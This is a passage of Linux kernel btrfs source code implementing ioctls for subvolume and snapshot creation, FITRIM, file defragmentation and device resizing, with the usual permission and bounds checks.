ip->flags |= BTRFS_INODE_COMPRESS;
ip->flags &= ~BTRFS_INODE_NOCOMPRESS;
} else {
ip->flags &= ~(BTRFS_INODE_COMPRESS | BTRFS_INODE_NOCOMPRESS);
}
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out_drop;
}
btrfs_update_iflags(inode);
inode_inc_iversion(inode);
inode->i_ctime = CURRENT_TIME;
ret = btrfs_update_inode(trans, root, inode);
btrfs_end_transaction(trans, root);
out_drop:
if (ret) {
ip->flags = ip_oldflags;
inode->i_flags = i_oldflags;
}
out_unlock:
mutex_unlock(&inode->i_mutex);
mnt_drop_write_file(file);
return ret;
}
static int btrfs_ioctl_getversion(struct file *file, int __user *arg)
{
struct inode *inode = file->f_path.dentry->d_inode;
return put_user(inode->i_generation, arg);
}
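/*
 * FITRIM: clamp the requested range and minimum length against what the
 * underlying devices can discard, trim the filesystem's free space, and
 * report back how much was actually trimmed.
 */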
static noinline int btrfs_ioctl_fitrim(struct file *file, void __user *arg)
{
struct btrfs_fs_info *fs_info = btrfs_sb(fdentry(file)->d_sb);
struct btrfs_device *device;
struct request_queue *q;
struct fstrim_range range;
u64 minlen = ULLONG_MAX;
u64 num_devices = 0;
u64 total_bytes = btrfs_super_total_bytes(fs_info->super_copy);
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
rcu_read_lock();
list_for_each_entry_rcu(device, &fs_info->fs_devices->devices,
dev_list) {
if (!device->bdev)
continue;
q = bdev_get_queue(device->bdev);
if (blk_queue_discard(q)) {
num_devices++;
minlen = min((u64)q->limits.discard_granularity,
minlen);
}
}
rcu_read_unlock();
if (!num_devices)
return -EOPNOTSUPP;
if (copy_from_user(&range, arg, sizeof(range)))
return -EFAULT;
if (range.start > total_bytes ||
range.len < fs_info->sb->s_blocksize)
return -EINVAL;
range.len = min(range.len, total_bytes - range.start);
range.minlen = max(range.minlen, minlen);
ret = btrfs_trim_fs(fs_info->tree_root, &range);
if (ret < 0)
return ret;
if (copy_to_user(arg, &range, sizeof(range)))
return -EFAULT;
return 0;
}
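/*
 * Create a brand new subvolume: allocate an objectid and a root tree
 * block, fill in and insert the root item into the tree of tree roots,
 * and link the new subvolume into the parent directory, all within one
 * transaction.
 */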
static noinline int create_subvol(struct btrfs_root *root,
struct dentry *dentry,
char *name, int namelen,
u64 *async_transid,
struct btrfs_qgroup_inherit **inherit)
{
struct btrfs_trans_handle *trans;
struct btrfs_key key;
struct btrfs_root_item root_item;
struct btrfs_inode_item *inode_item;
struct extent_buffer *leaf;
struct btrfs_root *new_root;
struct dentry *parent = dentry->d_parent;
struct inode *dir;
struct timespec cur_time = CURRENT_TIME;
int ret;
int err;
u64 objectid;
u64 new_dirid = BTRFS_FIRST_FREE_OBJECTID;
u64 index = 0;
uuid_le new_uuid;
ret = btrfs_find_free_objectid(root->fs_info->tree_root, &objectid);
if (ret)
return ret;
dir = parent->d_inode;
/*
* 1 - inode item
* 2 - refs
* 1 - root item
* 2 - dir items
*/
trans = btrfs_start_transaction(root, 6);
if (IS_ERR(trans))
return PTR_ERR(trans);
ret = btrfs_qgroup_inherit(trans, root->fs_info, 0, objectid,
inherit ? *inherit : NULL);
if (ret)
goto fail;
leaf = btrfs_alloc_free_block(trans, root, root->leafsize,
0, objectid, NULL, 0, 0, 0);
if (IS_ERR(leaf)) {
ret = PTR_ERR(leaf);
goto fail;
}
memset_extent_buffer(leaf, 0, 0, sizeof(struct btrfs_header));
btrfs_set_header_bytenr(leaf, leaf->start);
btrfs_set_header_generation(leaf, trans->transid);
btrfs_set_header_backref_rev(leaf, BTRFS_MIXED_BACKREF_REV);
btrfs_set_header_owner(leaf, objectid);
write_extent_buffer(leaf, root->fs_info->fsid,
(unsigned long)btrfs_header_fsid(leaf),
BTRFS_FSID_SIZE);
write_extent_buffer(leaf, root->fs_info->chunk_tree_uuid,
(unsigned long)btrfs_header_chunk_tree_uuid(leaf),
BTRFS_UUID_SIZE);
btrfs_mark_buffer_dirty(leaf);
memset(&root_item, 0, sizeof(root_item));
inode_item = &root_item.inode;
inode_item->generation = cpu_to_le64(1);
inode_item->size = cpu_to_le64(3);
inode_item->nlink = cpu_to_le32(1);
inode_item->nbytes = cpu_to_le64(root->leafsize);
inode_item->mode = cpu_to_le32(S_IFDIR | 0755);
root_item.flags = 0;
root_item.byte_limit = 0;
inode_item->flags = cpu_to_le64(BTRFS_INODE_ROOT_ITEM_INIT);
btrfs_set_root_bytenr(&root_item, leaf->start);
btrfs_set_root_generation(&root_item, trans->transid);
btrfs_set_root_level(&root_item, 0);
btrfs_set_root_refs(&root_item, 1);
btrfs_set_root_used(&root_item, leaf->len);
btrfs_set_root_last_snapshot(&root_item, 0);
btrfs_set_root_generation_v2(&root_item,
btrfs_root_generation(&root_item));
uuid_le_gen(&new_uuid);
memcpy(root_item.uuid, new_uuid.b, BTRFS_UUID_SIZE);
root_item.otime.sec = cpu_to_le64(cur_time.tv_sec);
root_item.otime.nsec = cpu_to_le32(cur_time.tv_nsec);
root_item.ctime = root_item.otime;
btrfs_set_root_ctransid(&root_item, trans->transid);
btrfs_set_root_otransid(&root_item, trans->transid);
btrfs_tree_unlock(leaf);
free_extent_buffer(leaf);
leaf = NULL;
btrfs_set_root_dirid(&root_item, new_dirid);
key.objectid = objectid;
key.offset = 0;
btrfs_set_key_type(&key, BTRFS_ROOT_ITEM_KEY);
ret = btrfs_insert_root(trans, root->fs_info->tree_root, &key,
&root_item);
if (ret)
goto fail;
key.offset = (u64)-1;
new_root = btrfs_read_fs_root_no_name(root->fs_info, &key);
if (IS_ERR(new_root)) {
btrfs_abort_transaction(trans, root, PTR_ERR(new_root));
ret = PTR_ERR(new_root);
goto fail;
}
btrfs_record_root_in_trans(trans, new_root);
ret = btrfs_create_subvol_root(trans, new_root, new_dirid);
if (ret) {
/* We potentially lose an unused inode item here */
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
/*
* insert the directory item
*/
ret = btrfs_set_inode_index(dir, &index);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_insert_dir_item(trans, root,
name, namelen, dir, &key,
BTRFS_FT_DIR, index);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_i_size_write(dir, dir->i_size + namelen * 2);
ret = btrfs_update_inode(trans, root, dir);
BUG_ON(ret);
ret = btrfs_add_root_ref(trans, root->fs_info->tree_root,
objectid, root->root_key.objectid,
btrfs_ino(dir), index, name, namelen);
BUG_ON(ret);
d_instantiate(dentry, btrfs_lookup_dentry(dir, dentry));
fail:
if (async_transid) {
*async_transid = trans->transid;
err = btrfs_commit_transaction_async(trans, root, 1);
} else {
err = btrfs_commit_transaction(trans, root);
}
if (err && !ret)
ret = err;
return ret;
}
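/*
 * Snapshot an existing subvolume: start a transaction, queue a
 * pending_snapshot record so the snapshot is actually created at commit
 * time, then look up and instantiate the resulting dentry.
 */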
static int create_snapshot(struct btrfs_root *root, struct dentry *dentry,
char *name, int namelen, u64 *async_transid,
bool readonly, struct btrfs_qgroup_inherit **inherit)
{
struct inode *inode;
struct btrfs_pending_snapshot *pending_snapshot;
struct btrfs_trans_handle *trans;
int ret;
if (!root->ref_cows)
return -EINVAL;
pending_snapshot = kzalloc(sizeof(*pending_snapshot), GFP_NOFS);
if (!pending_snapshot)
return -ENOMEM;
btrfs_init_block_rsv(&pending_snapshot->block_rsv,
BTRFS_BLOCK_RSV_TEMP);
pending_snapshot->dentry = dentry;
pending_snapshot->root = root;
pending_snapshot->readonly = readonly;
if (inherit) {
pending_snapshot->inherit = *inherit;
*inherit = NULL; /* take responsibility to free it */
}
trans = btrfs_start_transaction(root->fs_info->extent_root, 6);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto fail;
}
ret = btrfs_snap_reserve_metadata(trans, pending_snapshot);
BUG_ON(ret);
spin_lock(&root->fs_info->trans_lock);
list_add(&pending_snapshot->list,
&trans->transaction->pending_snapshots);
spin_unlock(&root->fs_info->trans_lock);
if (async_transid) {
*async_transid = trans->transid;
ret = btrfs_commit_transaction_async(trans,
root->fs_info->extent_root, 1);
} else {
ret = btrfs_commit_transaction(trans,
root->fs_info->extent_root);
}
if (ret) {
/* cleanup_transaction has freed this for us */
if (trans->aborted)
pending_snapshot = NULL;
goto fail;
}
ret = pending_snapshot->error;
if (ret)
goto fail;
ret = btrfs_orphan_cleanup(pending_snapshot->snap);
if (ret)
goto fail;
inode = btrfs_lookup_dentry(dentry->d_parent->d_inode, dentry);
if (IS_ERR(inode)) {
ret = PTR_ERR(inode);
goto fail;
}
BUG_ON(!inode);
d_instantiate(dentry, inode);
ret = 0;
fail:
kfree(pending_snapshot);
return ret;
}
/* copy of check_sticky() in fs/namei.c
* It's inline, so penalty for filesystems that don't use sticky bit is
* minimal.
*/
static inline int btrfs_check_sticky(struct inode *dir, struct inode *inode)
{
kuid_t fsuid = current_fsuid();
if (!(dir->i_mode & S_ISVTX))
return 0;
if (uid_eq(inode->i_uid, fsuid))
return 0;
if (uid_eq(dir->i_uid, fsuid))
return 0;
return !capable(CAP_FOWNER);
}
/* copy of may_delete() in fs/namei.c
* Check whether we can remove a link victim from directory dir, check
* whether the type of victim is right.
* 1. We can't do it if dir is read-only (done in permission())
* 2. We should have write and exec permissions on dir
* 3. We can't remove anything from append-only dir
* 4. We can't do anything with immutable dir (done in permission())
* 5. If the sticky bit on dir is set we should either
* a. be owner of dir, or
* b. be owner of victim, or
* c. have CAP_FOWNER capability
* 6. If the victim is append-only or immutable we can't do anything with
* links pointing to it.
* 7. If we were asked to remove a directory and victim isn't one - ENOTDIR.
* 8. If we were asked to remove a non-directory and victim isn't one - EISDIR.
* 9. We can't remove a root or mountpoint.
* 10. We don't allow removal of NFS sillyrenamed files; it's handled by
* nfs_async_unlink().
*/
static int btrfs_may_delete(struct inode *dir,struct dentry *victim,int isdir)
{
int error;
if (!victim->d_inode)
return -ENOENT;
BUG_ON(victim->d_parent->d_inode != dir);
audit_inode_child(dir, victim, AUDIT_TYPE_CHILD_DELETE);
error = inode_permission(dir, MAY_WRITE | MAY_EXEC);
if (error)
return error;
if (IS_APPEND(dir))
return -EPERM;
if (btrfs_check_sticky(dir, victim->d_inode)||
IS_APPEND(victim->d_inode)||
IS_IMMUTABLE(victim->d_inode) || IS_SWAPFILE(victim->d_inode))
return -EPERM;
if (isdir) {
if (!S_ISDIR(victim->d_inode->i_mode))
return -ENOTDIR;
if (IS_ROOT(victim))
return -EBUSY;
} else if (S_ISDIR(victim->d_inode->i_mode))
return -EISDIR;
if (IS_DEADDIR(dir))
return -ENOENT;
if (victim->d_flags & DCACHE_NFSFS_RENAMED)
return -EBUSY;
return 0;
}
/* copy of may_create() in fs/namei.c */
static inline int btrfs_may_create(struct inode *dir, struct dentry *child)
{
if (child->d_inode)
return -EEXIST;
if (IS_DEADDIR(dir))
return -ENOENT;
return inode_permission(dir, MAY_WRITE | MAY_EXEC);
}
/*
* Create a new subvolume below @parent. This is largely modeled after
* sys_mkdirat and vfs_mkdir, but we only do a single component lookup
* inside this filesystem so it's quite a bit simpler.
*/
static noinline int btrfs_mksubvol(struct path *parent,
char *name, int namelen,
struct btrfs_root *snap_src,
u64 *async_transid, bool readonly,
struct btrfs_qgroup_inherit **inherit)
{
struct inode *dir = parent->dentry->d_inode;
struct dentry *dentry;
int error;
mutex_lock_nested(&dir->i_mutex, I_MUTEX_PARENT);
dentry = lookup_one_len(name, parent->dentry, namelen);
error = PTR_ERR(dentry);
if (IS_ERR(dentry))
goto out_unlock;
error = -EEXIST;
if (dentry->d_inode)
goto out_dput;
error = btrfs_may_create(dir, dentry);
if (error)
goto out_dput;
down_read(&BTRFS_I(dir)->root->fs_info->subvol_sem);
if (btrfs_root_refs(&BTRFS_I(dir)->root->root_item) == 0)
goto out_up_read;
if (snap_src) {
error = create_snapshot(snap_src, dentry, name, namelen,
async_transid, readonly, inherit);
} else {
error = create_subvol(BTRFS_I(dir)->root, dentry,
name, namelen, async_transid, inherit);
}
if (!error)
fsnotify_mkdir(dir, dentry);
out_up_read:
up_read(&BTRFS_I(dir)->root->fs_info->subvol_sem);
out_dput:
dput(dentry);
out_unlock:
mutex_unlock(&dir->i_mutex);
return error;
}
/*
* When we're defragging a range, we don't want to kick it off again
* if it is really just waiting for delalloc to send it down.
* If we find a nice big extent or delalloc range for the bytes in the
* file you want to defrag, we return 0 to let you know to skip this
* part of the file
*/
static int check_defrag_in_cache(struct inode *inode, u64 offset, int thresh)
{
struct extent_io_tree *io_tree = &BTRFS_I(inode)->io_tree;
struct extent_map *em = NULL;
struct extent_map_tree *em_tree = &BTRFS_I(inode)->extent_tree;
u64 end;
read_lock(&em_tree->lock);
em = lookup_extent_mapping(em_tree, offset, PAGE_CACHE_SIZE);
read_unlock(&em_tree->lock);
if (em) {
end = extent_map_end(em);
free_extent_map(em);
if (end - offset > thresh)
return 0;
}
/* if we already have a nice delalloc here, just stop */
thresh /= 2;
end = count_range_bits(io_tree, &offset, offset + thresh,
thresh, EXTENT_DELALLOC, 1);
if (end >= thresh)
return 0;
return 1;
}
/*
* helper function to walk through a file and find extents
* newer than a specific transid, and smaller than thresh.
*
* This is used by the defragging code to find new and small
* extents
*/
static int find_new_extents(struct btrfs_root *root,
struct inode *inode, u64 newer_than,
u64 *off, int thresh)
{
struct btrfs_path *path;
struct btrfs_key min_key;
struct btrfs_key max_key;
struct extent_buffer *leaf;
struct btrfs_file_extent_item *extent;
int type;
int ret;
u64 ino = btrfs_ino(inode);
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
min_key.objectid = ino;
min_key.type = BTRFS_EXTENT_DATA_KEY;
min_key.offset = *off;
max_key.objectid = ino;
max_key.type = (u8)-1;
max_key.offset = (u64)-1;
path->keep_locks = 1;
while(1) {
ret = btrfs_search_forward(root, &min_key, &max_key,
path, 0, newer_than);
if (ret != 0)
goto none;
if (min_key.objectid != ino)
goto none;
if (min_key.type != BTRFS_EXTENT_DATA_KEY)
goto none;
leaf = path->nodes[0];
extent = btrfs_item_ptr(leaf, path->slots[0],
struct btrfs_file_extent_item);
type = btrfs_file_extent_type(leaf, extent);
if (type == BTRFS_FILE_EXTENT_REG &&
btrfs_file_extent_num_bytes(leaf, extent) < thresh &&
check_defrag_in_cache(inode, min_key.offset, thresh)) {
*off = min_key.offset;
btrfs_free_path(path);
return 0;
}
if (min_key.offset == (u64)-1)
goto none;
min_key.offset++;
btrfs_release_path(path);
}
none:
btrfs_free_path(path);
return -ENOENT;
}
static struct extent_map *defrag_lookup_extent(struct inode *inode, u64 start)
{
struct extent_map_tree *em_tree = &BTRFS_I(inode)->extent_tree;
struct extent_io_tree *io_tree = &BTRFS_I(inode)->io_tree;
struct extent_map *em;
u64 len = PAGE_CACHE_SIZE;
/*
* hopefully we have this extent in the tree already, try without
* the full extent lock
*/
read_lock(&em_tree->lock);
em = lookup_extent_mapping(em_tree, start, len);
read_unlock(&em_tree->lock);
if (!em) {
/* get the big lock and read metadata off disk */
lock_extent(io_tree, start, start + len - 1);
em = btrfs_get_extent(inode, NULL, 0, start, len, 0);
unlock_extent(io_tree, start, start + len - 1);
if (IS_ERR(em))
return NULL;
}
return em;
}
static bool defrag_check_next_extent(struct inode *inode, struct extent_map *em)
{
struct extent_map *next;
bool ret = true;
/* this is the last extent */
if (em->start + em->len >= i_size_read(inode))
return false;
next = defrag_lookup_extent(inode, em->start + em->len);
if (!next || next->block_start >= EXTENT_MAP_LAST_BYTE)
ret = false;
free_extent_map(next);
return ret;
}
static int should_defrag_range(struct inode *inode, u64 start, int thresh,
u64 *last_len, u64 *skip, u64 *defrag_end,
int compress)
{
struct extent_map *em;
int ret = 1;
bool next_mergeable = true;
/*
* make sure that once we start defragging an extent, we keep on
* defragging it
*/
if (start < *defrag_end)
return 1;
*skip = 0;
em = defrag_lookup_extent(inode, start);
if (!em)
return 0;
/* this will cover holes, and inline extents */
if (em->block_start >= EXTENT_MAP_LAST_BYTE) {
ret = 0;
goto out;
}
next_mergeable = defrag_check_next_extent(inode, em);
/*
* we hit a real extent, if it is big or the next extent is not a
* real extent, don't bother defragging it
*/
if (!compress && (*last_len == 0 || *last_len >= thresh) &&
(em->len >= thresh || !next_mergeable))
ret = 0;
out:
/*
* last_len ends up being a counter of how many bytes we've defragged.
* every time we choose not to defrag an extent, we reset *last_len
* so that the next tiny extent will force a defrag.
*
* The end result of this is that tiny extents before a single big
* extent will force at least part of that big extent to be defragged.
*/
if (ret) {
*defrag_end = extent_map_end(em);
} else {
*last_len = 0;
*skip = extent_map_end(em);
*defrag_end = 0;
}
free_extent_map(em);
return ret;
}
/*
* it doesn't do much good to defrag one or two pages
* at a time. This pulls in a nice chunk of pages
* to COW and defrag.
*
* It also makes sure the delalloc code has enough
* dirty data to avoid making new small extents as part
* of the defrag.
*
* It's a good idea to start RA on this range
* before calling this.
*/
static int cluster_pages_for_defrag(struct inode *inode,
struct page **pages,
unsigned long start_index,
int num_pages)
{
unsigned long file_end;
u64 isize = i_size_read(inode);
u64 page_start;
u64 page_end;
u64 page_cnt;
int ret;
int i;
int i_done;
struct btrfs_ordered_extent *ordered;
struct extent_state *cached_state = NULL;
struct extent_io_tree *tree;
gfp_t mask = btrfs_alloc_write_mask(inode->i_mapping);
file_end = (isize - 1) >> PAGE_CACHE_SHIFT;
if (!isize || start_index > file_end)
return 0;
page_cnt = min_t(u64, (u64)num_pages, (u64)file_end - start_index + 1);
ret = btrfs_delalloc_reserve_space(inode,
page_cnt << PAGE_CACHE_SHIFT);
if (ret)
return ret;
i_done = 0;
tree = &BTRFS_I(inode)->io_tree;
/* step one, lock all the pages */
for (i = 0; i < page_cnt; i++) {
struct page *page;
again:
page = find_or_create_page(inode->i_mapping,
start_index + i, mask);
if (!page)
break;
page_start = page_offset(page);
page_end = page_start + PAGE_CACHE_SIZE - 1;
while (1) {
lock_extent(tree, page_start, page_end);
ordered = btrfs_lookup_ordered_extent(inode,
page_start);
unlock_extent(tree, page_start, page_end);
if (!ordered)
break;
unlock_page(page);
btrfs_start_ordered_extent(inode, ordered, 1);
btrfs_put_ordered_extent(ordered);
lock_page(page);
/*
* we unlocked the page above, so we need to check if
* it was released or not.
*/
if (page->mapping != inode->i_mapping) {
unlock_page(page);
page_cache_release(page);
goto again;
}
}
if (!PageUptodate(page)) {
btrfs_readpage(NULL, page);
lock_page(page);
if (!PageUptodate(page)) {
unlock_page(page);
page_cache_release(page);
ret = -EIO;
break;
}
}
if (page->mapping != inode->i_mapping) {
unlock_page(page);
page_cache_release(page);
goto again;
}
pages[i] = page;
i_done++;
}
if (!i_done || ret)
goto out;
if (!(inode->i_sb->s_flags & MS_ACTIVE))
goto out;
/*
* so now we have a nice long stream of locked
* and up-to-date pages, let's wait on them
*/
for (i = 0; i < i_done; i++)
wait_on_page_writeback(pages[i]);
page_start = page_offset(pages[0]);
page_end = page_offset(pages[i_done - 1]) + PAGE_CACHE_SIZE;
lock_extent_bits(&BTRFS_I(inode)->io_tree,
page_start, page_end - 1, 0, &cached_state);
clear_extent_bit(&BTRFS_I(inode)->io_tree, page_start,
page_end - 1, EXTENT_DIRTY | EXTENT_DELALLOC |
EXTENT_DO_ACCOUNTING | EXTENT_DEFRAG, 0, 0,
&cached_state, GFP_NOFS);
if (i_done != page_cnt) {
spin_lock(&BTRFS_I(inode)->lock);
BTRFS_I(inode)->outstanding_extents++;
spin_unlock(&BTRFS_I(inode)->lock);
btrfs_delalloc_release_space(inode,
(page_cnt - i_done) << PAGE_CACHE_SHIFT);
}
set_extent_defrag(&BTRFS_I(inode)->io_tree, page_start, page_end - 1,
&cached_state, GFP_NOFS);
unlock_extent_cached(&BTRFS_I(inode)->io_tree,
page_start, page_end - 1, &cached_state,
GFP_NOFS);
for (i = 0; i < i_done; i++) {
clear_page_dirty_for_io(pages[i]);
ClearPageChecked(pages[i]);
set_page_extent_mapped(pages[i]);
set_page_dirty(pages[i]);
unlock_page(pages[i]);
page_cache_release(pages[i]);
}
return i_done;
out:
for (i = 0; i < i_done; i++) {
unlock_page(pages[i]);
page_cache_release(pages[i]);
}
btrfs_delalloc_release_space(inode, page_cnt << PAGE_CACHE_SHIFT);
return ret;
}
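/*
 * Defragment a file (or the range described by @range): walk it in
 * page-sized steps, let should_defrag_range() decide which extents are
 * worth rewriting, and redirty them in clusters so delalloc writes them
 * back as larger contiguous extents.  When @newer_than is non-zero only
 * extents from newer transactions are considered.
 */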
int btrfs_defrag_file(struct inode *inode, struct file *file,
struct btrfs_ioctl_defrag_range_args *range,
u64 newer_than, unsigned long max_to_defrag)
{
struct btrfs_root *root = BTRFS_I(inode)->root;
struct file_ra_state *ra = NULL;
unsigned long last_index;
u64 isize = i_size_read(inode);
u64 last_len = 0;
u64 skip = 0;
u64 defrag_end = 0;
u64 newer_off = range->start;
unsigned long i;
unsigned long ra_index = 0;
int ret;
int defrag_count = 0;
int compress_type = BTRFS_COMPRESS_ZLIB;
int extent_thresh = range->extent_thresh;
int max_cluster = (256 * 1024) >> PAGE_CACHE_SHIFT;
int cluster = max_cluster;
u64 new_align = ~((u64)128 * 1024 - 1);
struct page **pages = NULL;
if (extent_thresh == 0)
extent_thresh = 256 * 1024;
if (range->flags & BTRFS_DEFRAG_RANGE_COMPRESS) {
if (range->compress_type > BTRFS_COMPRESS_TYPES)
return -EINVAL;
if (range->compress_type)
compress_type = range->compress_type;
}
if (isize == 0)
return 0;
/*
* if we were not given a file, allocate a readahead
* context
*/
if (!file) {
ra = kzalloc(sizeof(*ra), GFP_NOFS);
if (!ra)
return -ENOMEM;
file_ra_state_init(ra, inode->i_mapping);
} else {
ra = &file->f_ra;
}
pages = kmalloc(sizeof(struct page *) * max_cluster,
GFP_NOFS);
if (!pages) {
ret = -ENOMEM;
goto out_ra;
}
/* find the last page to defrag */
if (range->start + range->len > range->start) {
last_index = min_t(u64, isize - 1,
range->start + range->len - 1) >> PAGE_CACHE_SHIFT;
} else {
last_index = (isize - 1) >> PAGE_CACHE_SHIFT;
}
if (newer_than) {
ret = find_new_extents(root, inode, newer_than,
&newer_off, 64 * 1024);
if (!ret) {
range->start = newer_off;
/*
* we always align our defrag to help keep
* the extents in the file evenly spaced
*/
i = (newer_off & new_align) >> PAGE_CACHE_SHIFT;
} else
goto out_ra;
} else {
i = range->start >> PAGE_CACHE_SHIFT;
}
if (!max_to_defrag)
max_to_defrag = last_index + 1;
/*
* make writeback start from i, so the defrag range can be
* written sequentially.
*/
if (i < inode->i_mapping->writeback_index)
inode->i_mapping->writeback_index = i;
while (i <= last_index && defrag_count < max_to_defrag &&
(i < (i_size_read(inode) + PAGE_CACHE_SIZE - 1) >>
PAGE_CACHE_SHIFT)) {
/*
* make sure we stop running if someone unmounts
* the FS
*/
if (!(inode->i_sb->s_flags & MS_ACTIVE))
break;
if (!should_defrag_range(inode, (u64)i << PAGE_CACHE_SHIFT,
extent_thresh, &last_len, &skip,
&defrag_end, range->flags &
BTRFS_DEFRAG_RANGE_COMPRESS)) {
unsigned long next;
/*
* the should_defrag function tells us how much to skip;
* bump our counter by the suggested amount.
*/
next = (skip + PAGE_CACHE_SIZE - 1) >> PAGE_CACHE_SHIFT;
i = max(i + 1, next);
continue;
}
if (!newer_than) {
cluster = (PAGE_CACHE_ALIGN(defrag_end) >>
PAGE_CACHE_SHIFT) - i;
cluster = min(cluster, max_cluster);
} else {
cluster = max_cluster;
}
if (range->flags & BTRFS_DEFRAG_RANGE_COMPRESS)
BTRFS_I(inode)->force_compress = compress_type;
if (i + cluster > ra_index) {
ra_index = max(i, ra_index);
btrfs_force_ra(inode->i_mapping, ra, file, ra_index,
cluster);
ra_index += max_cluster;
}
mutex_lock(&inode->i_mutex);
ret = cluster_pages_for_defrag(inode, pages, i, cluster);
if (ret < 0) {
mutex_unlock(&inode->i_mutex);
goto out_ra;
}
defrag_count += ret;
balance_dirty_pages_ratelimited_nr(inode->i_mapping, ret);
mutex_unlock(&inode->i_mutex);
if (newer_than) {
if (newer_off == (u64)-1)
break;
if (ret > 0)
i += ret;
newer_off = max(newer_off + 1,
(u64)i << PAGE_CACHE_SHIFT);
ret = find_new_extents(root, inode,
newer_than, &newer_off,
64 * 1024);
if (!ret) {
range->start = newer_off;
i = (newer_off & new_align) >> PAGE_CACHE_SHIFT;
} else {
break;
}
} else {
if (ret > 0) {
i += ret;
last_len += ret << PAGE_CACHE_SHIFT;
} else {
i++;
last_len = 0;
}
}
}
if ((range->flags & BTRFS_DEFRAG_RANGE_START_IO))
filemap_flush(inode->i_mapping);
if ((range->flags & BTRFS_DEFRAG_RANGE_COMPRESS)) {
/* the filemap_flush will queue IO into the worker threads, but
* we have to make sure the IO is actually started and that
* ordered extents get created before we return
*/
atomic_inc(&root->fs_info->async_submit_draining);
while (atomic_read(&root->fs_info->nr_async_submits) ||
atomic_read(&root->fs_info->async_delalloc_pages)) {
wait_event(root->fs_info->async_submit_wait,
(atomic_read(&root->fs_info->nr_async_submits) == 0 &&
atomic_read(&root->fs_info->async_delalloc_pages) == 0));
}
atomic_dec(&root->fs_info->async_submit_draining);
mutex_lock(&inode->i_mutex);
BTRFS_I(inode)->force_compress = BTRFS_COMPRESS_NONE;
mutex_unlock(&inode->i_mutex);
}
if (range->compress_type == BTRFS_COMPRESS_LZO) {
btrfs_set_fs_incompat(root->fs_info, COMPRESS_LZO);
}
ret = defrag_count;
out_ra:
if (!file)
kfree(ra);
kfree(pages);
return ret;
}
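/*
 * BTRFS_IOC_RESIZE: parse the "[devid:]size" string from user space and
 * grow or shrink the selected device accordingly.  Only one exclusive
 * device operation may be running at a time.
 */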
static noinline int btrfs_ioctl_resize(struct file *file,
void __user *arg)
{
u64 new_size;
u64 old_size;
u64 devid = 1;
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_vol_args *vol_args;
struct btrfs_trans_handle *trans;
struct btrfs_device *device = NULL;
char *sizestr;
char *devstr = NULL;
int ret = 0;
int mod = 0;
if (root->fs_info->sb->s_flags & MS_RDONLY)
return -EROFS;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
mnt_drop_write_file(file);
return -EINPROGRESS;
}
mutex_lock(&root->fs_info->volume_mutex);
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args)) {
ret = PTR_ERR(vol_args);
goto out;
}
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
sizestr = vol_args->name;
devstr = strchr(sizestr, ':');
if (devstr) {
char *end;
sizestr = devstr + 1;
*devstr = '\0';
devstr = vol_args->name;
devid = simple_strtoull(devstr, &end, 10);
printk(KERN_INFO "btrfs: resizing devid %llu\n",
(unsigned long long)devid);
}
device = btrfs_find_device(root->fs_info, devid, NULL, NULL);
if (!device) {
printk(KERN_INFO "btrfs: resizer unable to find device %llu\n",
(unsigned long long)devid);
ret = -EINVAL;
goto out_free;
}
if (device->fs_devices && device->fs_devices->seeding) {
printk(KERN_INFO "btrfs: resizer unable to apply on "
"seeding device %llu\n",
(unsigned long long)devid);
ret = -EINVAL;
goto out_free;
}
if (!strcmp(sizestr, "max"))
new_size = device->bdev->bd_inode->i_size;
else {
if (sizestr[0] == '-') {
mod = -1;
sizestr++;
} else if (sizestr[0] == '+') {
mod = 1;
sizestr++;
}
new_size = memparse(sizestr, NULL);
if (new_size == 0) {
ret = -EINVAL;
goto out_free;
}
}
if (device->is_tgtdev_for_dev_replace) {
ret = -EINVAL;
goto out_free;
}
old_size = device->total_bytes;
if (mod < 0) {
if (new_size > old_size) {
ret = -EINVAL;
goto out_free;
}
new_size = old_size - new_size;
} else if (mod > 0) {
new_size = old_size + new_size;
}
if (new_size < 256 * 1024 * 1024) {
ret = -EINVAL;
goto out_free;
}
if (new_size > device->bdev->bd_inode->i_size) {
ret = -EFBIG;
goto out_free;
}
do_div(new_size, root->sectorsize);
new_size *= root->sectorsize;
printk_in_rcu(KERN_INFO "btrfs: new size for %s is %llu\n",
rcu_str_deref(device->name),
(unsigned long long)new_size);
if (new_size > old_size) {
trans = btrfs_start_transaction(root, 0);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out_free;
}
ret = btrfs_grow_device(trans, device, new_size);
btrfs_commit_transaction(trans, root);
} else if (new_size < old_size) {
ret = btrfs_shrink_device(device, new_size);
} /* equal, nothing needs to be done */
out_free:
kfree(vol_args);
out:
mutex_unlock(&root->fs_info->volume_mutex);
mnt_drop_write_file(file);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static noinline int btrfs_ioctl_snap_create_transid(struct file *file,
char *name, unsigned long fd, int subvol,
u64 *transid, bool readonly,
struct btrfs_qgroup_inherit **inherit)
{
int namelen;
int ret = 0;
ret = mnt_want_write_file(file);
if (ret)
goto out;
namelen = strlen(name);
if (strchr(name, '/')) {
ret = -EINVAL;
goto out_drop_write;
}
if (name[0] == '.' &&
(namelen == 1 || (name[1] == '.' && namelen == 2))) {
ret = -EEXIST;
goto out_drop_write;
}
if (subvol) {
ret = btrfs_mksubvol(&file->f_path, name, namelen,
NULL, transid, readonly, inherit);
} else {
struct fd src = fdget(fd);
struct inode *src_inode;
if (!src.file) {
ret = -EINVAL;
goto out_drop_write;
}
src_inode = src.file->f_path.dentry->d_inode;
if (src_inode->i_sb != file->f_path.dentry->d_inode->i_sb) {
printk(KERN_INFO "btrfs: Snapshot src from "
"another FS\n");
ret = -EINVAL;
} else {
ret = btrfs_mksubvol(&file->f_path, name, namelen,
BTRFS_I(src_inode)->root,
